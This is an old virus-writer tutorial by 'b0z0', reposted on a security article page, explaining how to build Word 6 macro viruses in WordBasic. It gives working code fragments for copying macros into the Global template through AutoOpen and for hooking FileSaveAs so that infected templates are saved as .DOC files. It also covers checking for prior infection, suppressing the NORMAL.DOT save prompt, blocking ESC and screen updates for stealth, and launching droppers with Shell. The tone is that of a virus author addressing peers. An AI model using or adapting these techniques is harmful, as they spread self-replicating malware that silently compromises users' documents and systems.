Article & Guides
23/01/2009 Featured Article: How to remove Buzus Virus (permalink)
Can you remember old Word Macro Viruses ?(by b0z0)
2. How they work?
3. Creating a macro virus
4. Handling files
5. Executing Dos Commands
6. Other Stuff
7. Multiplatform features
8. A real threath?
There it's really simple to protect yourself from being infected. You can just disable the automatic execution of the macros. So Wordmacros can't be absolutely considered a real threath. Anyway the Wordbasic language is fun and has _a lot_ of interesting commands that can be used.
This article is online from 3450 days and has been seen 3280 times
. Wordmacro Viruses .
---. by b0z0 .---
In this last period the Wordmacro viruses became well known by any PC
user. After the first succesful macro virus attempt (the Concept macro)
many new techniques has been implemented in this type of virus
programming. Macro viruses are really simple to build, because they are
programmed in a quite simple programming language internal to Word (6.0
or later) called Wordbasic. Using some lacks of security and some risky
default options (that are also unconsidered by the tipical Word user :))
the infection and spread can easily become truth. In general the most
used AV products (i mean TSR utilities) doesn't care of DOC files,
because they are never really executed. This is the mainly advantage of
Wordmacros. Some guys also consider that Wordmacro viruses can be
considered as a multiplatform product, but this, due to some lacks of
Micro$oft work, isn't totally true.
2. How they work?
All Word documents can contain near the text also a file called
Template, which includes some specific definitions or macros (created
with the included Word macro editing utilities) that can operate in a
certain way on the text. This included macros can be also
autoexecutable, this means that they can run at the moment while the
document is loaded or can be executed on a determinate event. Word has
some predefinited macros with reserved names, which starts on some
specific operations like saving or opening a document. This
predefinited stuff (with all others default page styles and so on) is
located in the NORMAL.DOT template file. Creating a macro with one of
the predefinited names will lead to execute something that we like at a
specified event. The AutoExec macro for example is executed at the Word
startup, the AutoOpen is executed at each document opening. So the
general rule to do a takeover on the system is to replace some of the most
used predifined macros with our virulent macros.
3.Creating a macro virus
So the first thing to do in our Wordmacro is to put our virus macros
instead of the original ones when the infected document is opened. We
can easily put in the AutoOpen macro some lines, that will copy our
infecting routines on the right place in the main Word macro storage
(this is called the Global template), when the document will be opened.
For example if we want to copy our macro AutoClose in the Global template
our AutoOpen macro will look like this:
MacroCopy WindowName$()+":AutoClose", "Global:AutoClose" ,1
The Macrocopy commands in Wordbasic copies a macro (from a template) to
another macro (in the same or in another template) With this we will replace
the Autoclose macro in the Global template with our Autoclose from the
current infected document (which name is given by the "WindowName$()"
function). The final ",1" means that the macro is "Execute Only". This
attribute won't let the user to read or modify the macro once that it
was created. If we don't put the final "Execute Only" attribute any lamer
will be able to change something in our virus or the user will notice
that the macros aren't really of use to his work.
A tipical Wordmacro virus will look for other more interesting
predefinited macros. That would be cool, if we had the possibility to
infect a document when it is being saved. To do this we can handle the
FileSaveAs macro. We can put in it some code, that will put near the text
that the user will save also our virulent macros. Like we told at the
start of this section the add-on macros don't directly go to the DOC
file, but to the template file (DOT). This isn't a very good thing,
because like maybe you will notice, this will prevent us to infect other
DOCs. This isn't true, because we can save anyway the user's work as a
template and Word will at the next time load the saved file normally as it
is a normal document. In this manner our macros will go around the world
with the file with the extension .DOC, but definitely it will be only a
template :) Let's see an example of a FileSaveAs macro:
Dim dbox As FileSaveAs 'we define which dialog box will appear
GetcurValues dbox 'we inicialize and run the dialog box
Macrocopy "Global:AutoClose", WindowName$() + ":AutoClose" ,1
Macrocopy "Global:FileSaveAs", WindowName$() + ":FileSaveAs" ,1
dbox.Format = 1 'we are saving a template
FileSaveAs dbox 'we finally save it
In this example we copied two virulent macros (AutoClose and FileSaveAs)
in the new file, which name was given by the user in the dialog box. We
must of course first define the type of dialog box like a variable. If we
was handling another macro (say FileOpen for example) we may use another
dialog box depending on the macro (Dim dbox As FileOpen for example).
After inicializing the dialog box with GetcurValues (general inicializing
like directory where we stay, type and so on) we can finally display the
dialog box simply running Dialog and putting the name (in our case dbox)
of the just defined dialog box. Once copied our macros we defined that
we were saving a template and finally called the old save routine.
To implement our file infection macro we can also test, if the type of
file we are saving is a DOC or a DOT. If the file is something other (for
example the user is trying to save to a normal text file) it would be
good not to copy the macros. To prevent this we can put a test after
invoking the dialog box and test the dbox.Format. If the dbox.Format is
equal to 0 then the user saved in a DOC file (and we can infect it of
course transforming it in a template) and if the dbox.Format is equal to
1 the type is a template. In all the other cases the user selected
something other, that we won't infect. So the test rutine after invoking
the dialog box will be something like:
If ((dbox.Format = 0) Or (dbox.Format=1)) then
Like for FileSaveAs we can for example try infecting on FileSave or on
FileOpen (when a file is opened) or sometime else. This just depends from
Now that we have put some of our routines in the Global template it
would be good to write a macro, that will make our virus active when Word
starts. This macro is named AutoExec and will appear very simillar to the
AutoOpen macro. Infact in both cases we will only copy our macros instead
of the original ones if they aren't already installed.
Another important thing, while we are going resident or infecting a
document, is to control if the template (the Global if we are just going
resident or the file's template if we are infecting) is already infected
by our virulent macros. Simply we can scan all the names of the
installed macros and seek for one (of more) of our macros. This may look
For Cnt = 1 To CountMacros(0) 'we control all the macros in the Global
If Macroname$(Cnt,0) = "OurNamedMacro" Then 'it is ours?
Founded = 1 'we mark someway that we got it!
Now we have put some good macros in the Global template. When a user
will end his work and on a file and will exit from it, Word will
automatically notice him that also the NORMAL.DOT (the Global template)
has changed, asking you for a confirmation of saving. Of course this
wouldn't be a very good stealth feature. To prevent this we can now
write a macro, that will activate when we will exit from a file, that
will deactivate the Yes/No prompting. The macro that we are looking for
is the FileExit. To disable prompting we must just turn to zero a Word
internal variable and then recall the old FileExit procedure. So the macro
ToolsOptionsSave .GlobalDotPrompt = 0
The ToolsOptionSave is the well known Save folder in the Tools menu in the
submenu Option, where are defined the preferences on saving. In this case we
just directly switched off in that menu the option that enables prompting
for saving changes in NORMAL.DOT.
Additionally in all our macros it would be very good to include the "On
Error Goto" capability, that automatically call the function that is
given it as a parameter on an error occurance (after a function call or
more simply if there is a compatibility problem like we will see later).
This is *very* important when writing macros that includes dialog boxes
or interrupable jobs. Infact when a user press the Cancel button in any
dialog box an error will be generated, telling to the user that the macro
wasn't succesfully completed. With a small error handler we can hide
these errors and let our macros to continue. For example:
On Error Goto NoGood
; put here ya macro
; end of the macro
; do something else... for example only give again the control to the
; original function that the user was calling or just exit out of the
Another very important Word option that must be set (to be as stealth as
possible) is the Disableinput variable. Setting this to 1 will prevent
the interruption of the macro with the ESC key. If you don't set this a
user a little intelligent (duh... but if he was a little intelligent he
wouldn't use Word ;) ) may press ESC during the execution of your macro
(for example is you are writing to a file on the disk Word is halted for
many seconds and he can notice the activity on the disk... but anyway
under windoze the hard disk is always trashing ;))) ) for stopping it.
What is worst is that if he stopped a macro with ESC he will receive a
notice that the macro was succesfully stopped... not really a stealth
To continue with the stealth features (duh :) ) there is another
Wordbasic command that may be useful to hide ourself. Infact if we set
ScreenUpdate to 0 the document (or macro or everything :) ) will not be
updated during the execution of the macro. This can be very useful if
your macro also modifies something in the window with the text. To enable
again screen updating just set the variable to 1.
Maybe someone of you already noticed that the names of the functions
that we call are basically the same as the full name in the Word menus.
FileSaveAs ; is the SaveAs command in menu File
FileClose ; is the Close command in menu File
ToolsOptions ; is the Options command in menu Tools
ToolsOptionsSave ; is the Save folder in the Options command in
; the menu Tools
So, all the commands of the menu File are precedded by a 'File' and so
on. Just think what command do you want to hook, give a look to the help
for the complete syntax and go write the macro :)
Aditionally in Wordbasic you can also manipulate any external file on
your hard disk. There are a few important command commonly used. The
first is Open that opens a file on the disk. There are three types of file
Open "C:\PADA.NIA" For Input As #1
Open "C:\FOOBAR" For Output As #2
Open "C:\GULLI.VER" For Append As #3
With the first we open the file only for reading, in the second case for
writing and in the last we open the file for appending data at the end
of the existing file. Like you will see we must also assign a number to
each file we open. Word can actually handle a maximum of 4 files (1-4).
When we open a file for writing if the file doesn't exist Word will
create one for us. When we want read from a file if it doesn't exist Word
will give us an error (which can be easily handled with the already
described error handler). This can be useful if we are checking is a file
exist or not. Infact to see if a file is on the disk we can only open it
for Input and if an error occours then the file doesn't exist (and maybe
we are going to create it).
After we succesfully opened a file (depending what we want to do) we
can now write something to it with the Print or with the Write command
(there is only a minor difference in the format between the two commands).
Print #2, "Chauabunga"
We can also read something from it using the Input$ function (or also the
LineInput command if we are goin to read a line that is terminated with a
somechar$=Input$(20,#1) ;this will read 20 characters from the file #1
Line Input #1, $our ;will put in the var $our the current line from #1
When we have done all our operations on the file we finally can close it
with a simple:
Close #n ;closes file number 'n'
There are also many other very useful commands that may be of use in our
virulent macros (for example is very interesting the function Lof() which
returns the lenght of a file in bytes, Kill() that deletes a file,
SetAttr that changes the attributes of a file, GetAttr that takes the
attributes of a file, Name to rename a file or a directory, File$ to
search in the current directory some files with a pattern and so on)
but of course i'm not going to talk about them all :) Just give a look
to the help file for a more complete guide.
5.Executing Dos Commands
After the file handling with Wordbasic we can also execute any external
Dos program and also some of the internal Dos commands. To execute and
external program the syntax is very simple:
Shell "C:\DROPPER.COM", $type
After Shell we put the command that we would execute and the type (this
isn't mandatory) of the window of the program that is being executed. The
type can be a number from 0 to 4 where:
0 means that the window is minimized to an icon
1 means normal window
2 means like 0. this is put for compatibility with Excel
3 means big window
4 means inactive window
And this is all about the execution of external programs. Now let's give
a look to the Dos internal commands that Wordbasic support. Of course,
using this will not be spawn a window, so the user won't notice
absolutely anything. For example:
Shell "mkdir C:\GPL",0
These final effect of this commands will be the same, but the second will
spawn a new Dos shell for the execution of the command, and this maybe
will alert the user. It will of course also use more PC resources.
Here is a small list of very useful Dos internal commands supported by
Chdir "C:\FOO" ;changes current dir to C:\FOO
Mkdir "C:\WINSLOTH" ;creates the directory C:\WINSLOTH
Rmdir "C:\W1NL0SE" ;deletes the C:\W1NL0SE directory
path$=Environ$("PATH") ;puts in path$ the current PATH
Filecopy ..... ;to copy a file
and so on... :)
6. Other Stuff
Apart from this you can also do many other useful things with the
Wordbasic language. There is a full set of arithmetic operators and
functions for example. Commands to determine many things of a machine
(like language, cpu, mem) are also avaiable. The handling of the WIN.INI
config file is also a good optional :) as in other high level languages
the manipulation of strings is fully implemented.
7. Multiplatform features
One of the worst things of the Wordmacro viruses is the portability.
Infact a Wordmacro virus written using the english set of commands won't
work with the swedish version. Word will notice to the user that there
are some macros that are using unknown commands. Infact all of the names
of the menus are different. The FileClose of the english Word is for
example FileChiudi in the italian and DataiBeended in the german version.
That's simply because the names that are present into the menus are
different from version to version.
8. A real threath?
There is really simple to protect yourself from being infected. You can
just disable the automatic execution of the macros. So Wordmacros can't
be absolutely considered a real threath. Anyway the Wordbasic language is
fun and has _a lot_ of interesting commands that can be used.
Definitely Wordmacros are nice for us to have a little of fun, as usual
in our work :)
Antivirus con codice sorgente Basic
Infection on Closing
Come facevano i virus ad diffondersi
(by Rock Steady)
Il codice sorgente commentato del Junkie
(by Dark Angel)